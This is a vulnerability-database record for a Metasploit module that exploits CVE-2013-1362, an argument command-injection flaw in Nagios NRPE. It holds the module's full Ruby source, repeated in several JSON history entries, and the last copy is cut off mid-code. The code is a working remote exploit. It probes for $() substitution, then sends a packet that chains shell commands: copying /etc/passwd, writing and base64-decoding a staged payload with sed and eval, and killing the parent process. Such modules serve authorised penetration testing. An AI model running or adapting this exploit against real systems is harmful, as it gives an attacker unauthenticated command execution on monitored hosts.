ID MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',
'Description' => %q{
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central
Nagios server to actively poll information from the hosts it monitors. NRPE
has a configuration option dont_blame_nrpe which enables command-line arguments
to be provided remote plugins. When this option is enabled, even when NRPE makes
an effort to sanitize arguments to prevent command execution, it is possible to
execute arbitrary commands.
},
'Author' =>
[
'Rudolph Pereir', # Vulnerability discovery
'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1362' ],
[ 'OSVDB', '90582'],
[ 'BID', '58142'],
[ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl python ruby telnet',
# *_perl, *_python and *_ruby work if they are installed
}
},
'Targets' =>
[
[ 'Nagios Remote Plugin Executor prior to 2.14', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 21 2013'
))
register_options(
[
Opt::RPORT(5666),
OptEnum.new('NRPECMD', [
true,
"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg",
'check_procs',
['check_procs', 'check_users', 'check_load', 'check_disk']
]),
# Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below
OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true])
])
end
def send_message(message)
packet = [
2, # packet version
1, # packet type, 1 => query packet
0, # checksum, to be added later
0, # result code, discarded for query packet
message, # the command and arguments
0 # padding
]
packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum
begin
self.sock.put(packet.pack("nnNna1024n")) #send the packet
res = self.sock.get_once # get the response
rescue ::EOFError => eof
res = ""
end
return res.unpack("nnNnA1024n")[4] unless res.nil?
end
def setup
@ssl_socket = nil
@force_ssl = false
super
end
def exploit
if check != Exploit::CheckCode::Vulnerable
fail_with(Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections")
end
stage = "setsid nohup #{payload.encoded} & "
stage = Rex::Text.encode_base64(stage)
# NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :)
command = datastore['NRPECMD']
command << "!"
command << "$($(rm -f /tmp/$$)" # Delete the file if it exists
# need a way to write to a file without using redirection (>)
# cant count on perl being on all linux hosts, use GNU Sed
# TODO: Probably a better way to do this, some hosts may not have a /tmp
command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text
command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file
command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage
command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right?
command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes
command << "$(rm -f /tmp/$$))" # clean the file with the stage
connect
print_status("Sending request...")
send_message(command)
disconnect
end
def check
vprint_status("Checking if remote NRPE supports command line arguments")
begin
# send query asking to run "fake_check" command with command substitution in arguments
connect
res = send_message("__fake_check!$()")
# if nrpe is configured to support arguments and is not patched to add $() to
# NASTY_META_CHARS then the service will return:
# NRPE: Command '__fake_check' not defined
if res =~ /not defined/
return Exploit::CheckCode::Vulnerable
end
# Otherwise the service will close the connection if it is configured to disable arguments
rescue EOFError => eof
return Exploit::CheckCode::Safe
rescue Errno::ECONNRESET => reset
unless datastore['NRPESSL'] or @force_ssl
vprint_status("Retrying with ADH SSL")
@force_ssl = true
retry
end
return Exploit::CheckCode::Safe
rescue => e
return Exploit::CheckCode::Unknown
end
# TODO: patched version appears to go here
return Exploit::CheckCode::Unknown
end
# NRPE uses unauthenticated Anonymous-Diffie-Hellman
# setting the global SSL => true will break as we would be overlaying
# an SSLSocket on another SSLSocket which hasnt completed its handshake
def connect(global = true, opts={})
self.sock = super(global, opts)
if datastore['NRPESSL'] or @force_ssl
ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
ctx.ciphers = "ADH"
@ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)
@ssl_socket.connect
self.sock.extend(Rex::Socket::SslTcp)
self.sock.sslsock = @ssl_socket
self.sock.sslctx = ctx
end
return self.sock
end
def disconnect
@ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl
super
end
end
{"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-11-28T18:22:45", "history": [{"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/nagios_nrpe_arguments", "reporter": "Rapid7", "references": ["#", "http://cvedetails.com/cve/cve-2013-1362", "http://www.securityfocus.com/bid/58142", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-07-02T23:44:48", "history": [], "viewCount": 8, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\n\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-07-02T23:44:48", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/nagios_nrpe_arguments", "reporter": "Rapid7", "references": ["#", "http://cvedetails.com/cve/cve-2013-1362", "http://www.securityfocus.com/bid/58142", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-07-24T19:45:55", "history": [], "viewCount": 10, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-07-24T19:45:55", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-08-21T15:30:09", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-08-21T15:30:09", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-17T01:17:44", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query 